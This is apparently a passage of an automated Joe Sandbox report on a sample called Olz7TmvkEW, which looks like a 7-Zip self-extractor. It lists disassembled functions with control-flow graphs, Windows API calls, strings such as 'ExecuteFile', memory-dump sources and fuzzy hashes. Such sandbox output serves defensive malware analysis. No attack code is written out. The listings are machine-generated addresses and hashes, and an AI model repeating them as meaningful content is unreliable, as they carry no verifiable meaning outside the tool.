40ec81-40ec87 call 413226 1152->1180 1181 40ec8c-40ec9d call 40e45f 1152->1181 1153->1127 1153->1139 1166 40ec4b-40ec59 call 40f707 1156->1166 1167 40edec-40edf1 1156->1167 1157 40ef21-40ef2b call 40ce5c 1157->1115 1159->1118 1160->1115 1161->1160 1169 40ee13-40ee19 1163->1169 1174 40edae-40edc6 call 4107a2 1164->1174 1166->1181 1184 40ec5b-40ec66 call 413201 1166->1184 1167->1139 1173 40edf3-40edf5 1167->1173 1176 40ee64-40ee8d call 40ce5c * 2 1169->1176 1177 40ee1b-40ee27 call 40e558 1169->1177 1173->1153 1189 40edc8 1174->1189 1176->1094 1176->1101 1195 40ee35-40ee41 call 40e5a3 1177->1195 1196 40ee29-40ee33 1177->1196 1180->1181 1197 40eca5-40ecaa 1181->1197 1198 40ec9f-40eca1 1181->1198 1184->1181 1189->1169 1210 40ef30-40ef45 call 40ce5c * 2 1195->1210 1211 40ee47 1195->1211 1202 40ee4a-40ee62 call 4107a2 1196->1202 1199 40ecb2-40ecb7 1197->1199 1200 40ecac-40ecae 1197->1200 1198->1197 1205 40ecb9-40ecbb 1199->1205 1206 40ecbf-40ecc8 1199->1206 1200->1199 1202->1176 1202->1177 1205->1206 1206->1113 1206->1114 1210->1115 1211->1202 1217->1157 1218->1157 1219->1157 1220->1157
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 0040EA5A
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0040EAA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID: DmA${D@
                                                                      • API String ID: 1033339047-1777112864
                                                                      • Opcode ID: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                      • Instruction ID: 6b6f199f6b2a7d9dc60afa7eeb36d7837fa60508d4a378e5edde095099593778
                                                                      • Opcode Fuzzy Hash: 0fbc1e047aa24a6cf396f6002696145173c8f9cc79442394acc3b55e615792f3
                                                                      • Instruction Fuzzy Hash: 0E120371900249DFCB24DF66C88099ABBB5FF08304B14496EF91AA7391DB39E995CF84
                                                                      Function 00410CCB Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1221 410ccb-410ce8 call 40e0d0 1224 410e20-410e23 1221->1224 1225 410cee-410cf5 call 41076b 1221->1225 1228 410cf7-410cf9 1225->1228 1229 410cfe-410d2d call 40e036 memcpy 1225->1229 1228->1224 1232 410d30-410d38 1229->1232 1233 410d50-410d68 1232->1233 1234 410d3a-410d48 1232->1234 1240 410d6a-410d6f 1233->1240 1241 410dcf 1233->1241 1235 410dc4-410dcd ??3@YAXPAX@Z 1234->1235 1236 410d4a 1234->1236 1238 410e1e-410e1f 1235->1238 1236->1233 1237 410d4c-410d4e 1236->1237 1237->1233 1237->1235 1238->1224 1243 410d71-410d79 1240->1243 1244 410dd4-410dd7 1240->1244 1242 410dd1-410dd2 1241->1242 1245 410e17-410e1c ??3@YAXPAX@Z 1242->1245 1246 410d7b 1243->1246 1247 410dad-410dbf memmove 1243->1247 1244->1242 1245->1238 1248 410d8a-410d8e 1246->1248 1247->1232 1249 410d90-410d92 1248->1249 1250 410d82-410d84 1248->1250 1249->1247 1252 410d94-410d9d call 41076b 1249->1252 1250->1247 1251 410d86-410d87 1250->1251 1251->1248 1255 410dd9-410e0f memcpy call 40d041 1252->1255 1256 410d9f-410dab 1252->1256 1258 410e12-410e15 1255->1258 1256->1247 1257 410d7d-410d80 1256->1257 1257->1248 1258->1245
                                                                      APIs
                                                                      • memcpy.MSVCRT(00000000,?,00000020,00010000), ref: 00410D22
                                                                      • memmove.MSVCRT(00000000,?,00000020,?,00010000), ref: 00410DB9
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00410DC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@memcpymemmove
                                                                      • String ID:
                                                                      • API String ID: 3549172513-0
                                                                      • Opcode ID: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                                      • Instruction ID: 2e51937533cdabe9fe59c05819b629b516a53c036badf135e90f0136c29b37f2
                                                                      • Opcode Fuzzy Hash: 68ec5b1761c5ee7f9fc326a7c1c6742ca84d938ae768d4aa852de07e3c909998
                                                                      • Instruction Fuzzy Hash: F141C171A00204ABDB24EAA5D940BFEB7B5FF84704F14446EE846A7341D7B8BEC18B59
                                                                      Function 00404903 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1273 404903-404984 #17 call 413370 call 402131 call 402187 * 7 1292 404989-40499d SHGetSpecialFolderPathW 1273->1292 1293 404a32-404a36 1292->1293 1294 4049a3-4049ed wsprintfW call 401458 * 2 call 401370 * 2 call 4032d9 1292->1294 1293->1292 1295 404a3c-404a40 1293->1295 1305 4049f2-4049f8 1294->1305 1306 404a22-404a28 1305->1306 1307 4049fa-404a1d call 401370 * 2 call 4032d9 1305->1307 1306->1305 1309 404a2a-404a2d call 40269a 1306->1309 1307->1306 1309->1293
                                                                      APIs
                                                                      • #17.COMCTL32(00000000,00000020,-00000002), ref: 0040490F
                                                                        • Part of subcall function 00402131: GetUserDefaultUILanguage.KERNEL32(0040491F), ref: 0040213B
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                        • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                        • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                        • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                        • Part of subcall function 00402187: lstrcmpiW.KERNEL32(02533FD0,00404926), ref: 0040224B
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(02533FD0), ref: 0040225B
                                                                        • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                        • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                        • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                        • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                        • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00404926), ref: 00402279
                                                                        • Part of subcall function 00402187: _wtol.MSVCRT ref: 00402314
                                                                        • Part of subcall function 00402187: MultiByteToWideChar.KERNEL32(00000000,00416208,00000001,02533FD0,00000002), ref: 00402334
                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000), ref: 00404995
                                                                      • wsprintfW.USER32 ref: 004049B0
                                                                        • Part of subcall function 004032D9: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004049F2,?,?,?), ref: 004032DE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                      • String ID: 7zSfxFolder%02d
                                                                      • API String ID: 3387708999-2820892521
                                                                      • Opcode ID: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                      • Instruction ID: 5234f5b279cb727febf32c6091b250cce28905a448a9d0e240f4fe7ebf0ff8ab
                                                                      • Opcode Fuzzy Hash: 0b64465946cb2e48a0dbd03d6f906f8cc659a125e1421e758d292e165e0ccb9d
                                                                      • Instruction Fuzzy Hash: 2731B471A10205ABCB10FFA1DC9AAEEB768AF40304F00417FFA15B60E1EB784946CB58
                                                                      Function 00402BEE Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1315 402bee-402c38 call 413660 call 40d041 lstrlenA * 2 1319 402c3d-402c59 call 40d00d 1315->1319 1321 402d29 1319->1321 1322 402c5f-402c64 1319->1322 1323 402d2b-402d2f 1321->1323 1322->1321 1324 402c6a-402c74 1322->1324 1325 402c77-402c7c 1324->1325 1326 402cbb-402cc0 1325->1326 1327 402c7e-402c83 1325->1327 1328 402ce5-402d09 memmove 1326->1328 1330 402cc2-402cd5 memcmp 1326->1330 1327->1328 1329 402c85-402c98 memcmp 1327->1329 1335 402d18-402d23 1328->1335 1336 402d0b-402d12 1328->1336 1331 402d25-402d27 1329->1331 1332 402c9e-402ca8 1329->1332 1333 402cb5-402cb9 1330->1333 1334 402cd7-402ce3 1330->1334 1331->1323 1332->1321 1337 402caa-402cb0 call 40292b 1332->1337 1333->1325 1334->1325 1335->1323 1336->1335 1338 402c3a 1336->1338 1337->1333 1338->1319
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C20
                                                                      • lstrlenA.KERNEL32(?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402C28
                                                                      • memcmp.MSVCRT(00000000,?,?), ref: 00402C8E
                                                                      • memcmp.MSVCRT(00000000,?,?,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CCB
                                                                      • memmove.MSVCRT(?,?,00000000,?,00403D0E,00419858,?,?,00405C1F,00000000,00000000,?,?,?,00000000,-00000002), ref: 00402CFD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlenmemcmp$memmove
                                                                      • String ID:
                                                                      • API String ID: 3251180759-0
                                                                      • Opcode ID: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                      • Instruction ID: de6905f5b60a3a827beaa0a9a9e283af0395689e13c8cf078280906fc371a6c9
                                                                      • Opcode Fuzzy Hash: fa32a0385ddd39642fa32be0e776516a86df04650160174833642614f5e9d137
                                                                      • Instruction Fuzzy Hash: A7414972D0424DAFDB11DFA4C9889EEBBB9EF48384F14406AE845B3290D3B49E85CB55
                                                                      Function 00401611 Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1342 401611-401667 call 40f707 call 401370 call 401526 CreateThread 1349 401669 call 40851f 1342->1349 1350 40166e-401689 WaitForSingleObject 1342->1350 1349->1350 1352 40168b-40168e 1350->1352 1353 4016bd-4016c3 1350->1353 1356 401690-401693 1352->1356 1357 4016b1 1352->1357 1354 401721 1353->1354 1355 4016c5-4016da GetExitCodeThread 1353->1355 1363 401726-401729 1354->1363 1358 4016e4-4016ef 1355->1358 1359 4016dc-4016de 1355->1359 1360 401695-401698 1356->1360 1361 4016ad-4016af 1356->1361 1362 4016b3-4016bb call 408dbf 1357->1362 1365 4016f1-4016f2 1358->1365 1366 4016f7-401700 1358->1366 1359->1358 1364 4016e0-4016e2 1359->1364 1367 4016a9-4016ab 1360->1367 1368 40169a-40169d 1360->1368 1361->1362 1362->1354 1364->1363 1370 4016f4-4016f5 1365->1370 1371 401702-401709 1366->1371 1372 40170b-401717 SetLastError 1366->1372 1367->1362 1373 4016a4-4016a7 1368->1373 1374 40169f-4016a2 1368->1374 1376 401719-40171e call 408dbf 1370->1376 1371->1354 1371->1372 1372->1376 1373->1370 1374->1354 1374->1373 1376->1354
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,004012E3,00000000,00000000,?), ref: 00401655
                                                                      • WaitForSingleObject.KERNEL32(000000FF,?,004017F5,?,?), ref: 00401676
                                                                        • Part of subcall function 00408DBF: wvsprintfW.USER32(?,00000000,?), ref: 00408DE3
                                                                        • Part of subcall function 00408DBF: GetLastError.KERNEL32 ref: 00408DF4
                                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,00406B79), ref: 00408E1C
                                                                        • Part of subcall function 00408DBF: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,00406B79), ref: 00408E31
                                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E44
                                                                        • Part of subcall function 00408DBF: lstrlenW.KERNEL32(?), ref: 00408E4B
                                                                        • Part of subcall function 00408DBF: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00408E60
                                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(00000000,?), ref: 00408E76
                                                                        • Part of subcall function 00408DBF: lstrcpyW.KERNEL32(-00000002,?), ref: 00408E87
                                                                        • Part of subcall function 00408DBF: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 00408E90
                                                                        • Part of subcall function 00408DBF: LocalFree.KERNEL32(?), ref: 00408E9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                      • String ID:
                                                                      • API String ID: 359084233-0
                                                                      • Opcode ID: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                      • Instruction ID: 99d6c8c0394ba6fc9b9d299436d7c7a44fadaa3de81f278bf7a0439fefe7fe09
                                                                      • Opcode Fuzzy Hash: 66257497e4407e65e3ec51839b2cc1af24185b4b9cde7a4118d25a0965ef4d55
                                                                      • Instruction Fuzzy Hash: 0D31E131600200FBCA355B54DC95EEB36A8EB81754B28853BF515F62F0DA7A8C829A1E
                                                                      Function 00404545 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1379 404545-404576 call 401458 call 4027aa GetTempPathW 1384 404598-4045a5 1379->1384 1385 404578-404595 call 4027aa GetTempPathW call 40115e 1379->1385 1387 4045a8-4045df call 4027aa wsprintfW call 40115e GetFileAttributesW 1384->1387 1385->1384 1395 4045e1-4045eb 1387->1395 1396 4045ed-4045f3 1387->1396 1395->1387 1395->1396
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000002,00000000,00406D05,00000000,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404568
                                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000001,?,?,00405368,?,7ZSfx%03x.cmd), ref: 00404585
                                                                      • wsprintfW.USER32 ref: 004045BB
                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: PathTemp$AttributesFilewsprintf
                                                                      • String ID:
                                                                      • API String ID: 1746483863-0
                                                                      • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                      • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                      • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                      • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
                                                                      Function 00412525 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1397 412525-412563 call 40fc0a 1400 412565 call 4105e9 1397->1400 1401 41256a-412598 call 413350 1397->1401 1400->1401 1401->1400 1405 41259a-4125b9 1401->1405 1406 4127a3-4127a7 1405->1406 1407 4125bf-4125c1 1405->1407 1408 4125c3-4125c7 1407->1408 1409 4125c9-4125cc 1407->1409 1408->1409 1410 4125d1-4125d4 1408->1410 1409->1406 1411 4125d6 1410->1411 1412 4125dd-4125ee 1410->1412 1411->1409 1413 4125d8-4125db 1411->1413 1414 4125f0 1412->1414 1415 4125f7-412606 call 40d041 1412->1415 1413->1409 1413->1412 1414->1409 1416 4125f2-4125f5 1414->1416 1417 412609-41260b 1415->1417 1416->1409 1416->1415 1417->1406 1418 412611-41263c call 40e036 call 40e0d0 1417->1418 1423 41264f-412687 call 413350 1418->1423 1424 41263e 1418->1424 1423->1400 1429 41268d-4126c2 call 411603 call 410684 1423->1429 1425 412640-41264a ??3@YAXPAX@Z 1424->1425 1427 4127a2 1425->1427 1427->1406 1434 4126c4-4126c6 1429->1434 1435 4126cc-4126cf 1429->1435 1434->1435 1436 41276c-4127a0 call 411f01 call 410996 call 4115ca ??3@YAXPAX@Z 1434->1436 1435->1400 1437 4126d5-4126d7 1435->1437 1436->1427 1437->1400 1439 4126dd-4126ff call 411c05 1437->1439 1444 412701-412711 call 410996 call 4115ca 1439->1444 1445 412716-41271a 1439->1445 1444->1425 1448 412733-412737 1445->1448 1449 41271c-41272e call 410996 call 4115ca 1445->1449 1448->1400 1454 41273d-41275e call 4115ca call 411603 call 410684 1448->1454 1449->1425 1454->1400 1466 412764-412766 1454->1466 1466->1400 1466->1436
                                                                      APIs
                                                                        • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$ExceptionThrow
                                                                      • String ID: (nA
                                                                      • API String ID: 2803161813-867891557
                                                                      • Opcode ID: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
                                                                      • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                      • Opcode Fuzzy Hash: d538e313846df92285687d0c89883c737322acd0d92d246c018a36ad655cc348
                                                                      • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                      Function 0040CBAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                      • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: AllocExceptionStringThrow
                                                                      • String ID: PlA
                                                                      • API String ID: 3773818493-1533977103
                                                                      • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                      • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                      • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                      • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                      Function 00403C93 Relevance: 4.7, APIs: 3, Instructions: 151COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                        • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                        • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                      • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                      • String ID:
                                                                      • API String ID: 1642057587-0
                                                                      • Opcode ID: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
                                                                      • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                      • Opcode Fuzzy Hash: 8fe8159aa8f9171a80473dbbf27a02bdac3fe5d52869d40b93b57f1e27a36c33
                                                                      • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                      Function 0040172C Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002F,0000002F,?,00406616,?,00419810,00419810), ref: 00401739
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                        • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                        • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                        • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                        • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3170223790.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3170181376.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170279666.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170324078.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3170357444.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Olz7TmvkEW.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                      • String ID: ExecuteFile
                                                                      • API String ID: 1306139538-323923146
                                                                      • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                      • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
